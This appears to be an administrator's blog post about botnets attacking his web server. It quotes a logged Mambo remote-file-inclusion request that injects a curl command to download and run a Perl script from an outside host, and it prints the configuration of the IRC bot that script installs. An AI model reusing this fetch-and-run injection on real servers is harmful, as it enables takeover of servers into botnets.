Botnets

I really want to do something when I discover a botnet that has been trying to exploit some website on the server I administer. There are a few signatures that can be easily recognised as a attack that has been tried. One that I see often is one that tries to exploit a mambo bug that is more then one year old. This is such a log entry:

255.255.255.256 - - [19/Dec/2006:00:57:53 +0100] "GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://rebegea.xhost.ro/php/scan.pl;perl%20/tmp/unix
? HTTP/1.0" 200 9905 "-" "Mozilla/5.0"

As you can see I obfuscated the source ip. I downloaded this file referenced in the url. At the top of that script you see this piece of code:

my @adms=("sclipici");	       #
#----------------------------------------------################################################
my @canais=("#sclipici :lametrapchan","#sclipici :lametrapchan");     #
#----------------------------------------------################################################

my $nick='necazu';	                       #
#----------------------------------------------################################################
my $ircname = 'id';                         #
#----------------------------------------------################################################
chop (my $realname = `uname -a`);                   #
#----------------------------------------------################################################
$servidor='217.107.222.15' 		       #
unless $servidor;  			       #
#----------------------------------------------################################################
my $porta='6667';

As you can see it’s not so hard to find the irc server the exploited servers connect back to and the commands that are given. Here the irc server has the ip 217.107.222.15 and port 6667. The right thing to do now would be to warn the abuse contact for that ip. I tried that some time but after a while you give up because you never get any response.

The irc server found in this script isn’t active any more at the moment. But from an other access log entry I got this script. You can extract this ip and port 84.232.78.6:6667 from the script. They expect you to go to the channel #necazul with the nick gabiXXX with XXX some number.

Just drop by some time, I don’t think they like and I enough people do this they will have to move. I someone knows where you can report this stuff without wasting your time because no one will do something about it, please let me know.

The webserver I administer has been under some sort of DDOS attack for some weeks now. At first I noticed something was wrong because the server ran out of workers although the bandwidth and the number of requests per second where normal. After some time I discovered that some hosts tried to post on an old phpBB2 forum I removed a few weeks before. I’ve been running a script for twee weeks that parses the apache extended server status and sees if there is some host that posts to the url. The rate isn’t high but they don’t read the response and keep the tcp connection option so the connection needs to timeout.

At the moment I’m already blocking over 1150 ip’s and they keep trying. I’ve also put the list of blocked ip’s online, maybe someone can do something usefull with it: http://web.ulyssis.org/blocked-ip.txt